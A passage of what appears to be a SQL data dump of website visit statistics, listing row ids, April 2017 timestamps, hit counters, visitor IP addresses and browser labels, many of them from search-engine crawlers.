1','other'),(99115,1491705465,1,1,0,0,'46.219.247.100','chrome'),(99116,1491706060,1,0,1,0,'66.249.76.108',''),(99117,1491706659,1,0,1,0,'66.249.66.180',''),(99118,1491707266,1,1,0,0,'46.219.247.100','chrome'),(99119,1491707408,1,0,1,0,'40.77.167.94',''),(99120,1491707415,1,1,0,0,'164.132.161.19','other'),(99121,1491707481,1,1,0,0,'216.244.66.237','other'),(99122,1491707634,1,1,0,0,'164.132.161.3','other'),(99123,1491707744,1,1,0,0,'8.29.198.25','other'),(99124,1491708939,1,1,0,0,'164.132.161.75','other'),(99125,1491709065,1,1,0,0,'46.219.247.100','chrome'),(99126,1491709107,1,1,0,0,'164.132.161.44','other'),(99127,1491709181,1,1,0,0,'51.255.65.7','other'),(99128,1491709359,1,0,1,0,'66.249.76.29',''),(99129,1491709919,1,1,0,0,'128.72.156.132','msie'),(99130,1491709974,1,0,1,0,'207.46.13.111',''),(99131,1491710166,1,1,0,0,'163.172.64.180','other'),(99132,1491710758,1,1,0,0,'128.69.209.170','msie'),(99133,1491710865,1,1,0,0,'46.219.247.100','chrome'),(99134,1491711530,1,1,0,0,'51.255.65.19','other'),(99135,1491711935,1,1,0,0,'95.31.182.52','msie'),(99136,1491712089,1,1,0,0,'213.191.17.34','msie'),(99137,1491712131,1,1,0,0,'163.172.64.243','other'),(99138,1491712665,1,1,0,0,'46.219.247.100','chrome'),(99139,1491713512,1,0,1,0,'66.249.66.177',''),(99140,1491713639,1,1,0,0,'95.84.251.116','opera'),(99141,1491713644,1,1,0,0,'95.24.9.34','chrome'),(99142,1491713647,1,1,0,0,'188.244.34.231','opera'),(99143,1491713648,1,1,0,0,'109.63.152.38','chrome'),(99144,1491713681,1,1,0,0,'51.255.65.53','other'),(99145,1491714325,1,1,0,0,'216.244.66.237','other'),(99146,1491714465,1,1,0,0,'46.219.247.100','chrome'),(99147,1491714641,1,1,0,0,'207.46.13.137','other'),(99148,1491715609,1,1,0,0,'216.244.66.237','other'),(99149,1491715775,1,0,1,0,'66.249.76.109',''),(99150,1491715982,1,0,1,0,'66.249.66.183',''),(99151,1491716265,1,1,0,0,'46.219.247.100','chrome'),(99152,1491717469,1,0,1,0,'66.249.76.108',''),(99153,1491717594,2,2,0,0,'40.77.167.94','other'),(99154,1491718019,1,1,0,0,'52.86.176.3','other'),(99155,1491718066,1,1,0,0,'46.219.247.100','chrome'),(99156,1491718229,1,1,0,0,'163.172.64.199','other'),(99157,1491718588,1,1,0,0,'8.29.198.25','other'),(99158,1491719286,1,1,0,0,'51.255.65.2','other'),(99159,1491719289,1,1,0,0,'128.72.156.132','msie'),(99160,1491719865,1,1,0,0,'46.219.247.100','chrome'),(99161,1491719909,1,1,0,0,'176.15.56.192','msie'),(99162,1491720081,1,1,0,0,'164.132.161.24','other'),(99163,1491721227,1,1,0,0,'213.191.17.34','msie'),(99164,1491721279,1,0,1,0,'66.249.76.107',''),(99165,1491721307,1,0,1,0,'66.249.66.177',''),(99166,1491721347,1,0,1,0,'66.249.76.28',''),(99167,1491721348,1,1,0,0,'163.172.68.118','other'),(99168,1491721665,1,1,0,0,'46.219.247.100','chrome'),(99169,1491721812,6,6,0,0,'136.243.68.226','other'),(99170,1491721840,1,1,0,0,'46.147.212.206','msie'),(99171,1491721851,1,0,1,0,'207.46.13.137',''),(99172,1491723353,1,1,0,0,'40.77.167.68','other'),(99173,1491723468,1,1,0,0,'46.219.247.100','chrome'),(99174,1491723485,1,0,1,0,'66.249.76.28',''),(99175,1491723555,1,0,1,0,'66.249.66.180',''),(99176,1491724061,1,1,0,0,'51.255.65.6','other'),(99177,1491725265,1,1,0,0,'46.219.247.100','chrome'),(99178,1491725895,1,1,0,0,'66.249.93.156','chrome'),(99179,1491725985,1,1,0,0,'66.249.76.109','chrome'),(99180,1491726678,1,0,1,0,'66.249.76.28',''),(99181,1491727066,1,1,0,0,'46.219.247.100','chrome'),(99182,1491727092,1,0,1,0,'40.77.167.94',''),(99183,1491727469,1,1,0,0,'164.132.161.96','other'),(99184,1491727620,1,0,1,0,'66.249.76.28',''),(99185,1491727709,23,23,0,0,'84.213.178.172','other'),(99186,1491728004,1,1,0,0,'66.249.76.107','chrome'),(99187,1491728013,1,1,0,0,'176.193.188.149','msie'),(99188,1491728862,1,1,0,0,'128.69.209.170','msie'),(99189,1491728865,1,1,0,0,'46.219.247.100','chrome'),(99190,1491729239,1,0,1,0,'66.249.76.30',''),(99191,1491729240,1,1,0,0,'216.244.66.237','other'),(99192,1491729304,1,0,1,0,'66.249.66.177',''),(99193,1491729392,1,1,0,0,'51.255.65.85','other'),(99194,1491729427,1,1,0,0,'8.29.198.25','other'),(99195,1491729590,1,0,1,0,'66.249.76.28',''),(99196,1491729602,1,0,1,0,'66.249.76.29',''),(99197,1491730598,1,0,1,0,'66.249.66.180',''),(99198,1491730665,1,1,0,0,'46.219.247.100','chrome'),(99199,1491730780,1,1,0,0,'46.161.9.30','chrome'),(99200,1491730854,1,1,0,0,'164.132.161.90','other'),(99201,1491731345,1,1,0,0,'164.132.161.41','other'),(99202,1491731376,1,1,0,0,'37.73.236.99','chrome'),(99203,1491732465,1,1,0,0,'46.219.247.100','chrome'),(99204,1491733342,1,0,1,0,'66.249.66.180',''),(99205,1491734265,1,1,0,0,'46.219.247.100','chrome'),(99206,1491734485,1,0,1,0,'66.249.66.81',''),(99207,1491735151,1,1,0,0,'128.68.142.233','msie'),(99208,1491735188,1,0,1,0,'66.249.76.107',''),(99209,1491735253,1,1,0,0,'180.76.15.19','other'),(99210,1491735659,1,1,0,0,'66.249.76.107','chrome'),(99211,1491736065,1,1,0,0,'46.219.247.100','chrome'),(99212,1491736362,1,0,1,0,'157.55.39.115',''),(99213,1491736999,1,1,0,0,'164.132.161.49','other'),(99214,1491737203,1,0,1,0,'66.249.76.29',''),(99215,1491737266,1,1,0,0,'164.132.161.38','other'),(99216,1491737424,1,1,0,0,'37.53.229.102','chrome'),(99217,1491737436,1,1,0,0,'141.8.142.15','other'),(99218,1491737865,1,1,0,0,'46.219.247.100','chrome'),(99219,1491737892,1,1,0,0,'163.172.64.223','other'),(99220,1491739336,1,1,0,0,'51.255.65.86','other'),(99221,1491739348,1,1,0,0,'216.244.66.237','other'),(99222,1491739628,1,1,0,0,'164.132.161.7','other'),(99223,1491739665,1,1,0,0,'46.219.247.100','chrome'),(99224,1491739804,1,1,0,0,'51.15.40.233','chrome'),(99225,1491740259,1,1,0,0,'8.29.198.27','other'),(99226,1491740905,1,1,0,0,'91.196.178.35','chrome'),(99227,1491740999,1,1,0,0,'51.255.65.2','other'),(99228,1491741037,1,0,1,0,'40.77.167.94',''),(99229,1491741042,1,0,1,0,'66.249.76.107',''),(99230,1491741466,1,1,0,0,'46.219.247.100','chrome'),(99231,1491741929,1,1,0,0,'164.132.161.18','other'),(99232,1491742939,1,1,0,0,'51.255.65.3','other'),(99233,1491743120,1,1,0,0,'51.255.65.77','other'),(99234,1491743265,1,1,0,0,'46.219.247.100','chrome'),(99235,1491745066,1,1,0,0,'46.219.247.100','chrome'),(99236,1491745856,1,1,0,0,'51.255.65.33','other'),(99237,1491746281,1,1,0,0,'163.172.64.225','other'),(99238,1491746869,1,1,0,0,'46.219.247.100','chrome'),(99239,1491748316,1,0,1,0,'157.55.39.17',''),(99240,1491748665,1,1,0,0,'46.219.247.100','chrome'),(99241,1491749175,1,0,1,0,'66.249.76.29',''),(99242,1491749470,1,0,1,0,'66.249.66.183',''),(99243,1491749761,1,1,0,0,'164.132.161.39','other'),(99244,1491750394,1,1,0,0,'51.255.65.84','other'),(99245,1491750467,1,1,0,0,'46.219.247.100','chrome'),(99246,1491750528,1,1,0,0,'164.132.161.88','other'),(99247,1491750641,1,1,0,0,'51.255.65.27','other'),(99248,1491751095,1,1,0,0,'8.29.198.26','other'),(99249,1491751350,1,1,0,0,'216.244.66.237','other'),(99250,1491751689,2,2,0,0,'66.249.76.109','chrome'),(99251,1491752266,1,1,0,0,'46.219.247.100','chrome'),(99252,1491752395,1,0,1,0,'207.46.13.227',''),(99253,1491752804,1,1,0,0,'130.180.218.226','chrome'),(99254,1491752806,1,1,0,0,'51.255.65.69','other'),(99255,1491752814,1,1,0,0,'180.76.15.27','other'),(99256,1491753181,1,1,0,0,'141.8.142.15','other'),(99257,1491753781,1,1,0,0,'207.46.13.227','other'),(99258,1491753879,1,1,0,0,'164.132.161.87','other'),(99259,1491754066,1,1,0,0,'46.219.247.100','chrome'),(99260,1491754831,1,0,1,0,'66.249.76.29',''),(99261,1491754976,2,1,1,0,'157.55.39.139',''),(99262,1491755253,1,0,1,0,'66.249.76.107',''),(99263,1491755702,1,1,0,0,'66.249.76.109','chrome'),(99264,1491755866,1,1,0,0,'46.219.247.100','chrome'),(99265,1491756239,1,1,0,0,'83.217.214.72','msie'),(99266,1491756480,1,1,0,0,'51.255.65.55','other'),(99267,1491757459,1,1,0,0,'52.86.176.3','other'),(99268,1491757666,1,1,0,0,'46.219.247.100','chrome'),(99269,1491757761,1,1,0,0,'91.196.178.131','firefox'),(99270,1491757943,1,1,0,0,'216.244.66.237','other'),(99271,1491758064,1,1,0,0,'95.108.213.34','other'),(99272,1491758481,1,1,0,0,'178.255.215.94','other'),(99273,1491758577,1,1,0,0,'66.249.76.108','chrome'),(99274,1491758842,1,1,0,0,'164.132.161.15','other'),(99275,1491759466,1,1,0,0,'46.219.247.100','chrome'),(99276,1491759745,1,1,0,0,'5.58.4.194','msie'),(99277,1491760227,1,1,0,0,'37.52.17.221','chrome'),(99278,1491760422,1,1,0,0,'164.132.161.96','other'),(99279,1491760525,1,1,0,0,'66.249.76.107','chrome'),(99280,1491760750,1,0,1,0,'66.249.66.84',''),(99281,1491760832,1,1,0,0,'66.249.76.29','chrome'),(99282,1491761266,1,1,0,0,'46.219.247.100','chrome'),(99283,1491761507,1,1,0,0,'163.172.64.250','other'),(99284,1491761560,1,1,0,0,'207.46.13.70','other'),(99285,1491761925,1,1,0,0,'8.29.198.25','other'),(99286,1491762081,1,1,0,0,'164.132.161.97','other'),(99287,1491762515,1,1,0,0,'164.132.161.58','other'),(99288,1491762744,1,1,0,0,'66.249.76.109','chrome'),(99289,1491763066,1,1,0,0,'46.219.247.100','chrome'),(99290,1491763189,1,1,0,0,'216.244.66.237','other'),(99291,1491763896,1,1,0,0,'5.58.4.194','msie'),(99292,1491764824,1,1,0,0,'51.255.65.91','other'),(99293,1491764866,1,1,0,0,'46.219.247.100','chrome'),(99294,1491765276,1,1,0,0,'141.8.142.38','other'),(99295,1491765333,1,1,0,0,'216.244.66.237','other'),(99296,1491765647,1,1,0,0,'164.132.161.6','other'),(99297,1491765713,1,1,0,0,'164.132.161.18','other'),(99298,1491766307,1,1,0,0,'207.46.13.87','other'),(99299,1491766666,1,1,0,0,'46.219.247.100','chrome'),(99300,1491767147,1,1,0,0,'216.244.66.237','other'),(99301,1491767594,1,1,0,0,'164.132.161.33','other'),(99302,1491767645,1,0,1,0,'66.249.76.108',''),(99303,1491767736,1,1,0,0,'51.255.65.77','other'),(99304,1491767754,1,0,1,0,'66.249.76.109',''),(99305,1491767807,1,1,0,0,'163.172.64.244','other'),(99306,1491767948,1,1,0,0,'176.195.116.47','chrome'),(99307,1491768106,1,1,0,0,'93.175.236.51','firefox'),(99308,1491768240,1,0,1,0,'66.249.76.30',''),(99309,1491768264,1,1,0,0,'5.58.4.194','opera'),(99310,1491768353,1,1,0,0,'164.132.161.39','other'),(99311,1491768434,1,0,1,0,'66.249.76.28',''),(99312,1491768466,1,1,0,0,'46.219.247.100','chrome'),(99313,1491769358,1,1,0,0,'157.55.39.101','other'),(99314,1491769962,1,0,1,0,'66.249.66.177',''),(99315,1491770266,1,1,0,0,'46.219.247.100','chrome'),(99316,1491770547,1,0,1,0,'157.55.39.101',''),(99317,1491770993,1,1,0,0,'163.172.68.127','other'),(99318,1491771433,1,1,0,0,'163.172.68.132','other'),(99319,1491771771,1,0,1,0,'157.55.39.101',''),(99320,1491772066,1,1,0,0,'46.219.247.100','chrome'),(99321,1491772176,1,1,0,0,'164.132.161.57','other'),(99322,1491772262,1,1,0,0,'5.58.4.194','opera'),(99323,1491772365,1,1,0,0,'51.255.65.2','other'),(99324,1491772753,1,1,0,0,'8.29.198.26','other'),(99325,1491773623,1,1,0,0,'163.172.64.223','other'),(99326,1491773866,1,1,0,0,'46.219.247.100','chrome'),(99327,1491774321,1,0,1,0,'66.249.76.29',''),(99328,1491774603,1,0,1,0,'66.249.66.177',''),(99329,1491774798,1,1,0,0,'207.46.13.79','other'),(99330,1491775237,1,1,0,0,'164.132.161.84','other'),(99331,1491775619,2,0,2,0,'157.55.39.135',''),(99332,1491775666,1,1,0,0,'46.219.247.100','chrome'),(99333,1491775880,1,1,0,0,'207.46.13.79','other'),(99334,1491775913,1,1,0,0,'164.132.161.33','other'),(99335,1491776336,1,1,0,0,'95.31.182.52','msie'),(99336,1491776760,12,12,0,0,'89.238.188.121','other'),(99337,1491777466,1,1,0,0,'46.219.247.100','chrome'),(99338,1491777767,1,1,0,0,'213.191.17.34','msie'),(99339,1491779266,1,1,0,0,'46.219.247.100','chrome'),(99340,1491779443,1,0,1,0,'66.249.76.109',''),(99341,1491780136,1,1,0,0,'51.255.65.7','other'),(99342,1491781066,1,1,0,0,'46.219.247.100','chrome'),(99343,1491781457,1,1,0,0,'5.58.4.194','opera'),(99344,1491781989,1,1,0,0,'164.132.161.62','other'),(99345,1491782671,1,1,0,0,'164.132.161.96','other'),(99346,1491782866,1,1,0,0,'46.219.247.100','chrome'),(99347,1491783582,1,1,0,0,'8.29.198.27','other'),(99348,1491783840,1,1,0,0,'128.72.156.132','msie'),(99349,1491784394,1,1,0,0,'51.255.65.83','other'),(99350,1491784449,1,1,0,0,'164.132.161.44','other'),(99351,1491784666,1,1,0,0,'46.219.247.100','chrome'),(99352,1491784690,1,1,0,0,'176.192.202.100','msie'),(99353,1491785393,1,1,0,0,'163.172.71.21','other'),(99354,1491785494,1,1,0,0,'51.255.65.54','other'),(99355,1491785591,1,1,0,0,'180.76.15.146','other'),(99356,1491785592,1,1,0,0,'180.76.15.134','other'),(99357,1491786180,1,1,0,0,'95.31.182.52','msie'),(99358,1491786229,1,1,0,0,'128.75.83.51','msie'),(99359,1491786418,1,1,0,0,'5.58.4.194','opera'),(99360,1491786466,1,1,0,0,'46.219.247.100','chrome'),(99361,1491786656,1,1,0,0,'164.132.161.92','other'),(99362,1491788267,1,1,0,0,'46.219.247.100','chrome'),(99363,1491789513,1,0,1,0,'157.55.39.105',''),(99364,1491790066,1,1,0,0,'46.219.247.100','chrome'),(99365,1491790607,1,0,1,0,'66.249.66.81',''),(99366,1491790753,1,1,0,0,'51.255.65.60','other'),(99367,1491790995,1,1,0,0,'216.244.66.237','other'),(99368,1491791866,1,1,0,0,'46.219.247.100','chrome'),(99369,1491792197,2,1,1,0,'66.249.76.28',''),(99370,1491792199,1,1,0,0,'66.249.76.109','chrome'),(99371,1491792366,1,1,0,0,'216.244.66.237','other'),(99372,1491792448,1,1,0,0,'51.255.65.3','other'),(99373,1491792998,1,1,0,0,'51.255.65.64','other'),(99374,1491793672,1,1,0,0,'46.219.247.100','chrome'),(99375,1491793790,1,1,0,0,'208.43.225.84','other'),(99376,1491793912,1,1,0,0,'51.255.65.73','other'),(99377,1491794312,1,1,0,0,'164.132.161.29','other'),(99378,1491794408,1,1,0,0,'8.29.198.26','other'),(99379,1491794953,1,0,1,0,'66.249.76.109',''),(99380,1491795466,1,1,0,0,'46.219.247.100','chrome'),(99381,1491796108,1,1,0,0,'164.132.161.17','other'),(99382,1491796212,1,0,1,0,'66.249.76.107',''),(99383,1491796590,1,1,0,0,'164.132.161.3','other'),(99384,1491797268,1,1,0,0,'46.219.247.100','chrome'),(99385,1491797919,1,0,1,0,'66.249.76.108',''),(99386,1491798075,1,1,0,0,'164.132.161.48','other'),(99387,1491798435,2,0,2,0,'66.249.76.109',''),(99388,1491798849,1,1,0,0,'91.196.178.72','firefox'),(99389,1491799066,1,1,0,0,'46.219.247.100','chrome'),(99390,1491799121,1,1,0,0,'51.255.65.8','other'),(99391,1491800866,1,1,0,0,'46.219.247.100','chrome'),(99392,1491801045,1,1,0,0,'163.172.64.222','other'),(99393,1491801353,1,1,0,0,'66.102.9.59','chrome'),(99394,1491801357,1,1,0,0,'163.172.64.241','other'),(99395,1491801743,1,0,1,0,'40.77.167.41',''),(99396,1491802389,1,1,0,0,'51.255.65.4','other'),(99397,1491802667,1,1,0,0,'46.219.247.100','chrome'),(99398,1491802703,1,0,1,0,'66.249.76.29',''),(99399,1491803122,1,1,0,0,'164.132.161.94','other'),(99400,1491803254,1,1,0,0,'163.172.64.225','other'),(99401,1491803295,1,1,0,0,'163.172.64.230','other'),(99402,1491803748,1,1,0,0,'180.76.15.30','other'),(99403,1491803847,1,1,0,0,'163.172.64.245','other'),(99404,1491804259,1,1,0,0,'180.76.15.26','other'),(99405,1491804289,1,1,0,0,'91.196.178.34','firefox'),(99406,1491804467,1,1,0,0,'46.219.247.100','chrome'),(99407,1491804741,1,1,0,0,'217.69.133.169','firefox'),(99408,1491804981,1,1,0,0,'95.132.39.39','firefox'),(99409,1491805251,1,1,0,0,'8.29.198.25','other'),(99410,1491806266,1,1,0,0,'46.219.247.100','chrome'),(99411,1491806282,1,0,1,0,'66.249.66.180',''),(99412,1491806570,1,1,0,0,'164.132.161.73','other'),(99413,1491807398,1,1,0,0,'163.172.64.217','other'),(99414,1491807569,1,1,0,0,'91.196.178.71','chrome'),(99415,1491807749,1,1,0,0,'180.76.15.142','other'),(99416,1491807965,1,1,0,0,'163.172.64.181','other'),(99417,1491807972,1,1,0,0,'91.196.178.166','chrome'),(99418,1491808188,1,1,0,0,'51.255.65.55','other'),(99419,1491808844,1,1,0,0,'216.244.66.237','other'),(99420,1491808996,1,0,1,0,'40.77.167.24',''),(99421,1491809513,1,1,0,0,'51.255.65.14','other'),(99422,1491810076,1,1,0,0,'91.196.178.68','chrome'),(99423,1491810583,1,1,0,0,'163.172.64.229','other'),(99424,1491810627,1,1,0,0,'40.77.167.24','other'),(99425,1491811442,1,1,0,0,'91.196.178.166','chrome'),(99426,1491811444,1,1,0,0,'91.196.178.68','firefox'),(99427,1491812397,1,1,0,0,'95.108.179.15','other'),(99428,1491812399,1,1,0,0,'5.255.253.63','other'),(99429,1491812480,1,1,0,0,'69.197.163.195','other'),(99430,1491812487,1,1,0,0,'195.49.151.99','chrome'),(99431,1491812509,1,1,0,0,'163.172.64.225','other'),(99432,1491813042,1,0,1,0,'66.249.66.180',''),(99433,1491813100,1,1,0,0,'46.219.249.59','chrome'),(99434,1491813648,1,1,0,0,'163.172.64.220','other'),(99435,1491813776,1,1,0,0,'51.255.65.23','other'),(99436,1491814037,1,1,0,0,'37.55.3.214','chrome'),(99437,1491814058,1,1,0,0,'91.196.178.68','firefox'),(99438,1491814065,1,1,0,0,'164.132.161.56','other'),(99439,1491814100,2,2,0,0,'93.74.212.147','firefox'),(99440,1491814106,1,1,0,0,'164.132.161.87','other'),(99441,1491814289,1,1,0,0,'164.132.161.75','other'),(99442,1491814365,1,0,1,0,'66.249.76.108',''),(99443,1491814592,1,1,0,0,'91.196.178.71','firefox'),(99444,1491814787,1,0,1,0,'66.249.66.180',''),(99445,1491815124,1,0,1,0,'66.249.76.29',''),(99446,1491815322,2,2,0,0,'91.196.178.71','chrome'),(99447,1491815395,1,1,0,0,'93.74.212.147','firefox'),(99448,1491815599,2,2,0,0,'69.30.198.242','other'),(99449,1491815709,1,0,1,0,'66.249.76.30',''),(99450,1491816082,1,1,0,0,'8.29.198.26','other'),(99451,1491816191,1,1,0,0,'91.196.178.68','firefox'),(99452,1491816284,1,1,0,0,'91.196.178.69','firefox'),(99453,1491816901,1,0,1,0,'66.249.76.109',''),(99454,1491816916,1,1,0,0,'91.196.177.15','chrome'),(99455,1491818339,1,1,0,0,'164.132.161.23','other'),(99456,1491818687,1,1,0,0,'163.172.64.251','other'),(99457,1491818731,1,1,0,0,'130.180.219.94','chrome'),(99458,1491819069,1,1,0,0,'163.172.71.90','other'),(99459,1491819402,1,1,0,0,'37.53.74.49','chrome'),(99460,1491819416,1,1,0,0,'95.108.213.34','other'),(99461,1491819507,1,1,0,0,'164.132.161.11','other'),(99462,1491819626,1,1,0,0,'91.196.178.165','chrome'),(99463,1491819879,1,1,0,0,'5.167.123.145','firefox'),(99464,1491820310,1,1,0,0,'95.133.184.250','chrome'),(99465,1491820682,1,0,1,0,'66.249.76.107',''),(99466,1491820688,1,1,0,0,'130.180.218.230','firefox'),(99467,1491821126,1,1,0,0,'91.196.178.166','chrome'),(99468,1491821171,1,1,0,0,'91.196.178.162','chrome'),(99469,1491821731,1,1,0,0,'91.196.177.46','chrome'),(99470,1491822032,1,1,0,0,'164.132.161.55','other'),(99471,1491822034,1,1,0,0,'91.196.178.66','firefox'),(99472,1491823022,1,0,1,0,'66.249.76.107',''),(99473,1491823057,1,1,0,0,'91.196.178.40','chrome'),(99474,1491823219,1,1,0,0,'208.43.225.84','other'),(99475,1491823227,1,1,0,0,'94.153.200.90','chrome'),(99476,1491823494,1,1,0,0,'91.196.177.46','firefox'),(99477,1491823908,1,1,0,0,'46.201.226.21','firefox'),(99478,1491823936,1,1,0,0,'91.196.178.71','chrome'),(99479,1491825388,1,1,0,0,'194.44.144.18','chrome'),(99480,1491826194,1,1,0,0,'52.86.176.3','other'),(99481,1491826488,1,0,1,0,'207.46.13.238',''),(99482,1491826812,1,0,1,0,'66.249.66.183',''),(99483,1491826871,2,2,0,0,'91.196.177.26','chrome'),(99484,1491826909,1,1,0,0,'8.29.198.27','other'),(99485,1491827321,2,2,0,0,'80.254.155.43','chrome'),(99486,1491827579,1,1,0,0,'51.255.65.79','other'),(99487,1491827634,1,1,0,0,'207.46.13.123','other'),(99488,1491828159,1,1,0,0,'51.255.65.52','other'),(99489,1491828249,1,1,0,0,'51.255.65.74','other'),(99490,1491828939,1,1,0,0,'51.255.65.30','other'),(99491,1491828943,1,1,0,0,'51.255.65.47','other'),(99492,1491829221,1,1,0,0,'51.255.65.53','other'),(99493,1491829761,1,1,0,0,'31.202.12.20','chrome'),(99494,1491829829,1,1,0,0,'80.254.155.43','chrome'),(99495,1491829921,1,0,1,0,'66.249.76.109',''),(99496,1491830032,1,1,0,0,'51.255.65.63','other'),(99497,1491830221,1,1,0,0,'163.172.64.253','other'),(99498,1491830264,1,1,0,0,'164.132.161.96','other'),(99499,1491830308,1,1,0,0,'37.54.82.97','chrome'),(99500,1491830336,2,2,0,0,'141.8.142.154','other'),(99501,1491830390,1,1,0,0,'157.55.39.169','other'),(99502,1491830403,2,2,0,0,'95.108.213.34','other'),(99503,1491830733,1,1,0,0,'95.108.179.15','other'),(99504,1491830742,1,1,0,0,'178.154.200.45','other'),(99505,1491831157,1,1,0,0,'91.209.11.236','other'),(99506,1491831209,1,1,0,0,'141.8.142.164','other'),(99507,1491831728,1,1,0,0,'164.132.161.27','other'),(99508,1491832363,1,1,0,0,'91.196.178.65','chrome'),(99509,1491832454,1,1,0,0,'91.196.178.101','chrome'),(99510,1491832578,1,1,0,0,'91.209.11.236','other'),(99511,1491833219,1,1,0,0,'51.255.65.35','other'),(99512,1491833283,1,0,1,0,'66.249.76.29',''),(99513,1491833347,1,1,0,0,'92.113.61.134','chrome'),(99514,1491833350,1,1,0,0,'46.164.155.57','chrome'),(99515,1491833424,1,1,0,0,'37.9.113.38','other'),(99516,1491833428,1,1,0,0,'93.158.152.59','other'),(99517,1491833558,2,2,0,0,'91.209.11.236','other'),(99518,1491834091,1,1,0,0,'212.111.198.100','chrome'),(99519,1491834687,1,1,0,0,'164.132.161.92','other'),(99520,1491835000,1,1,0,0,'91.209.11.236','other'),(99521,1491835142,1,1,0,0,'51.255.65.92','other'),(99522,1491835521,1,1,0,0,'128.72.156.132','msie'),(99523,1491835625,1,1,0,0,'51.255.65.60','other'),(99524,1491836343,1,1,0,0,'128.69.209.170','msie'),(99525,1491836354,1,0,1,0,'66.249.76.29',''),(99526,1491836367,1,1,0,0,'163.172.64.189','other'),(99527,1491836561,1,1,0,0,'51.255.65.95','other'),(99528,1491837387,1,1,0,0,'51.255.65.40','other'),(99529,1491837684,1,1,0,0,'163.172.71.90','other'),(99530,1491837734,1,1,0,0,'8.29.198.26','other'),(99531,1491837857,1,1,0,0,'5.228.76.188','msie'),(99532,1491838053,1,1,0,0,'128.75.83.51','msie'),(99533,1491838815,1,1,0,0,'164.132.161.60','other'),(99534,1491839036,1,0,1,0,'66.249.76.107',''),(99535,1491839788,1,1,0,0,'164.132.161.63','other'),(99536,1491840667,1,1,0,0,'95.108.213.34','other'),(99537,1491840671,1,1,0,0,'141.8.142.154','other'),(99538,1491840674,1,1,0,0,'141.8.142.164','other'),(99539,1491840677,1,1,0,0,'5.255.253.81','other'),(99540,1491840683,2,2,0,0,'141.8.142.15','other'),(99541,1491840725,1,1,0,0,'5.255.253.63','other'),(99542,1491841584,1,1,0,0,'164.132.161.74','other'),(99543,1491842131,1,1,0,0,'178.154.200.37','other'),(99544,1491843109,1,1,0,0,'164.132.161.8','other'),(99545,1491844014,1,1,0,0,'91.196.178.33','chrome'),(99546,1491844423,1,0,1,0,'66.249.76.107',''),(99547,1491845785,1,1,0,0,'95.135.90.121','firefox'),(99548,1491846071,1,1,0,0,'91.196.178.39','chrome'),(99549,1491846610,1,1,0,0,'51.255.65.48','other'),(99550,1491846792,1,0,1,0,'66.249.66.180',''),(99551,1491847021,2,2,0,0,'141.8.142.15','other'),(99552,1491847030,1,1,0,0,'141.8.142.154','other'),(99553,1491847037,3,3,0,0,'95.108.179.15','other'),(99554,1491847962,2,2,0,0,'141.8.142.164','other'),(99555,1491848040,3,3,0,0,'95.108.213.34','other'),(99556,1491848131,3,3,0,0,'141.8.142.15','other'),(99557,1491848177,1,1,0,0,'5.255.253.63','other'),(99558,1491848566,1,1,0,0,'8.29.198.26','other'),(99559,1491848990,2,2,0,0,'216.244.66.237','other'),(99560,1491849171,1,0,1,0,'66.249.76.28',''),(99561,1491849250,1,1,0,0,'164.132.161.92','other'),(99562,1491849707,1,1,0,0,'207.46.13.86','other'),(99563,1491850088,1,0,1,0,'157.55.39.141',''),(99564,1491850594,1,1,0,0,'157.55.39.116','other'),(99565,1491850754,1,1,0,0,'163.172.64.199','other'),(99566,1491851151,1,1,0,0,'193.194.127.217','firefox'),(99567,1491851236,1,1,0,0,'109.86.20.252','other'),(99568,1491851485,1,1,0,0,'164.132.161.59','other'),(99569,1491852112,1,1,0,0,'164.132.161.36','other'),(99570,1491852991,1,0,1,0,'157.55.39.116',''),(99571,1491853953,1,1,0,0,'51.255.65.67','other'),(99572,1491854350,1,1,0,0,'180.76.15.149','other'),(99573,1491854365,1,1,0,0,'51.255.65.56','other'),(99574,1491855050,1,1,0,0,'157.55.39.116','other'),(99575,1491855140,1,1,0,0,'91.196.178.162','chrome'),(99576,1491856506,1,0,1,0,'66.249.66.183',''),(99577,1491856562,1,1,0,0,'164.132.161.36','other'),(99578,1491857701,1,1,0,0,'51.255.65.84','other'),(99579,1491858593,1,0,1,0,'66.249.76.29',''),(99580,1491859392,1,1,0,0,'8.29.198.25','other'),(99581,1491860761,1,1,0,0,'141.8.142.97','other'),(99582,1491860789,1,0,1,0,'66.249.76.109',''),(99583,1491860937,1,1,0,0,'141.8.132.72','other'),(99584,1491861065,1,1,0,0,'95.27.139.243','msie'),(99585,1491861456,1,0,1,0,'66.249.66.81',''),(99586,1491863282,1,1,0,0,'164.132.161.67','other'),(99587,1491863704,1,1,0,0,'163.172.64.193','other'),(99588,1491864087,2,2,0,0,'52.35.197.224','msie'),(99589,1491864088,1,0,1,0,'66.249.66.183',''),(99590,1491864569,1,1,0,0,'93.158.152.79','other'),(99591,1491864577,1,1,0,0,'178.154.200.45','other'),(99592,1491864580,1,1,0,0,'5.255.253.63','other'),(99593,1491864585,1,1,0,0,'37.9.113.43','other'),(99594,1491864588,1,1,0,0,'178.154.200.37','other'),(99595,1491864592,1,1,0,0,'141.8.132.72','other'),(99596,1491864595,1,1,0,0,'164.132.161.72','other'),(99597,1491864601,1,1,0,0,'5.255.253.58','other'),(99598,1491864605,1,1,0,0,'5.255.253.43','other'),(99599,1491865638,1,0,1,0,'66.249.66.177',''),(99600,1491865904,1,1,0,0,'207.46.13.86','other'),(99601,1491866481,1,1,0,0,'52.86.176.3','other'),(99602,1491867494,2,2,0,0,'216.244.66.237','other'),(99603,1491868147,1,1,0,0,'51.255.65.52','other'),(99604,1491868498,1,0,1,0,'66.249.76.30',''),(99605,1491868820,1,1,0,0,'207.46.13.86','other'),(99606,1491868945,1,1,0,0,'164.132.161.28','other'),(99607,1491869333,1,1,0,0,'157.55.39.36','other'),(99608,1491869919,2,2,0,0,'216.244.66.237','other'),(99609,1491870029,1,0,1,0,'66.249.76.107',''),(99610,1491870226,1,1,0,0,'8.29.198.26','other'),(99611,1491874737,1,1,0,0,'217.182.132.19','other'),(99612,1491875257,1,0,1,0,'207.46.13.192',''),(99613,1491875414,2,0,2,0,'207.46.13.86',''),(99614,1491876538,1,1,0,0,'216.244.66.237','other'),(99615,1491876594,1,1,0,0,'51.255.65.10','other'),(99616,1491877111,1,1,0,0,'51.255.71.122','other'),(99617,1491877966,1,1,0,0,'216.244.66.237','other'),(99618,1491878142,2,0,2,0,'207.46.13.10',''),(99619,1491878362,1,1,0,0,'51.255.65.71','other'),(99620,1491878727,1,1,0,0,'164.132.161.22','other'),(99621,1491879200,1,1,0,0,'217.182.132.78','other'),(99622,1491880940,1,1,0,0,'51.255.65.58','other'),(99623,1491881064,1,1,0,0,'8.29.198.26','other'),(99624,1491881171,1,0,1,0,'66.249.76.28',''),